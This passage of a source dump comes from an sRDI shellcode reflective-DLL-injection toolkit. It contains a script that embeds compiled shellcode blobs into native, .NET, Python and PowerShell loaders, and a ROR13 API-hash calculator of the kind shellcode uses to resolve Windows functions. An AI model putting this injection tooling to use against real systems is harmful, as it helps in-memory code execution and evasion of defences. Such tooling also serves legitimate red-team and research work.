var rdiShellcode32 = new byte[] {{ {} }};
var rdiShellcode64 = new byte[] {{ {} }};
'''

# Python loader: escaped bytes literals.
PythonTemplate = '''
rdiShellcode32 = b'{}'
rdiShellcode64 = b'{}'
'''
23 |
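def _read_bytes(path):
    """Return the full contents of *path* as bytes, closing the handle on exit."""
    with open(path, 'rb') as handle:
        return handle.read()


def _hex_escaped(blob):
    """Render *blob* as a run of ``\\xNN`` escapes for a C or Python string literal."""
    return ''.join('\\x{:02X}'.format(b) for b in blob)


def _hex_list(blob):
    """Render *blob* as comma-separated ``0xNN`` literals for a byte-array initialiser."""
    return ','.join('0x{:02X}'.format(b) for b in blob)


def _patch_between_markers(path, insert, leader_width):
    """Replace the text between StartMarker and EndMarker in the source file at *path*.

    Args:
        path: loader source file to rewrite in place.
        insert: text placed directly after StartMarker.
        leader_width: number of comment-leader characters immediately before EndMarker
            that must be preserved so the end marker stays inside a comment.

    Raises:
        ValueError: if either marker is missing or they are out of order, so the file is
            left untouched instead of being rewritten around a ``find()`` result of -1.
    """
    with open(path, 'r') as handle:
        code = handle.read()

    start = code.find(StartMarker)
    end = code.find(EndMarker)
    if start < 0 or end < 0:
        raise ValueError('{}: {} / {} markers not found'.format(path, StartMarker, EndMarker))

    start += len(StartMarker)
    end -= leader_width  # keep the comment leader in front of EndMarker
    if end < start:
        raise ValueError('{}: end marker precedes start marker'.format(path))

    with open(path, 'w') as handle:
        handle.write(code[:start] + insert + code[end:])


def main():
    """Embed the built sRDI shellcode blobs into every loader source.

    Usage: ``EncodeBlobs.py SOLUTION_DIR``. Reads ``bin/ShellcodeRDI_x86.bin`` and
    ``bin/ShellcodeRDI_x64.bin`` under the solution directory and rewrites the region
    between StartMarker and EndMarker in the native, .NET, Python and PowerShell loaders.
    Prints a message and returns without touching any file when either blob is missing.
    """
    parser = argparse.ArgumentParser(description='sRDI Blob Encoder', conflict_handler='resolve')
    parser.add_argument('solution_dir', help='Solution Directory')
    arguments = parser.parse_args()
    solution_dir = arguments.solution_dir

    binFile32 = os.path.join(solution_dir, 'bin', 'ShellcodeRDI_x86.bin')
    binFile64 = os.path.join(solution_dir, 'bin', 'ShellcodeRDI_x64.bin')

    if not os.path.isfile(binFile32) or not os.path.isfile(binFile64):
        print("[!] ShellcodeRDI_x86.bin and ShellcodeRDI_x64.bin files weren't in the bin directory")
        return

    binData32 = _read_bytes(binFile32)
    binData64 = _read_bytes(binFile64)

    escaped32, escaped64 = _hex_escaped(binData32), _hex_escaped(binData64)
    listed32, listed64 = _hex_list(binData32), _hex_list(binData64)

    # (relative path, replacement text, width of the comment leader before EndMarker)
    targets = [
        ('Native/Loader.cpp',
         NativeTemplate.format(escaped32, escaped64, len(binData32), len(binData64)), 2),
        ('DotNet/Program.cs', DotNetTemplate.format(listed32, listed64), 2),
        ('Python/ShellcodeRDI.py', PythonTemplate.format(escaped32, escaped64), 1),
        ('PowerShell/ConvertTo-Shellcode.ps1', DotNetTemplate.format(listed32, listed64), 2),
    ]

    for relative_path, insert, leader_width in targets:
        target = os.path.join(solution_dir, relative_path)
        _patch_between_markers(target, insert, leader_width)
        print('[+] Updated {}'.format(target))

    print("")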
107 |
108 |
109 | print("")
110 |
# Run the encoder only when executed as a script, not when imported.
if __name__ == "__main__":
    main()
113 |
--------------------------------------------------------------------------------
/lib/Python/FunctionToHash.py:
--------------------------------------------------------------------------------
1 |
2 | import sys
3 |
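MASK32 = 0xFFFFFFFF
ROR_BITS = 13


def ror(val, r_bits, max_bits):
    """Rotate *val* right by *r_bits* inside a *max_bits*-wide unsigned word.

    Bits of *val* above *max_bits* are discarded first; *r_bits* is reduced modulo
    *max_bits*, so rotating by a full word width is the identity.
    """
    mask = (1 << max_bits) - 1
    r_bits %= max_bits
    return ((val & mask) >> r_bits) | ((val << (max_bits - r_bits)) & mask)


def hash_bytes(data, r_bits=ROR_BITS):
    """Fold *data* with the rotate-right-then-add hash, wrapping to 32 bits after each add.

    Each byte is folded as ``h = ror(h, r_bits, 32) + b``. The sum is masked every
    time so the value never leaves the 32-bit range; masking only once at the end
    leaves an add after the final rotate able to spill past 0xFFFFFFFF.
    """
    h = 0
    for b in data:
        h = (ror(h, r_bits, 32) + b) & MASK32
    return h


def function_to_hash(function, module=None):
    """Return the 32-bit hash for *function*, optionally combined with *module*'s hash.

    Args:
        function: exported function name; hashed as its default-encoded bytes plus a NUL.
        module: module file name; upper-cased, UTF-16LE encoded with a two-byte NUL, hashed
            the same way and added to the function hash. ``None`` hashes the function alone.

    Returns:
        An int in ``0..0xFFFFFFFF``.
    """
    function_hash = hash_bytes(function.encode() + b'\x00')
    if module is None:
        return function_hash
    module_hash = hash_bytes(module.upper().encode('UTF-16LE') + b'\x00\x00')
    return (function_hash + module_hash) & MASK32


USAGE = ("\nUsage:\nFunctionToHash.py [Module] [Function]\nFunctionToHash.py kernel32.dll CreateProcessA"
         "\n\nOR\n\nFunctionToHash.py [Function]\nFunctionToHash.py ExportedFunction")


def main(argv=None):
    """Command-line entry point: ``FunctionToHash.py [Module] Function`` prints the hash as hex.

    With no or too many arguments the usage text is printed and the script exits normally,
    matching the previous behaviour.
    """
    argv = sys.argv if argv is None else argv
    if len(argv) not in (2, 3):
        print(USAGE)
        return

    if len(argv) == 3:
        result = function_to_hash(argv[2], argv[1])
    else:
        result = function_to_hash(argv[1])

    print(hex(result))


if __name__ == '__main__':
    main()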
43 |
--------------------------------------------------------------------------------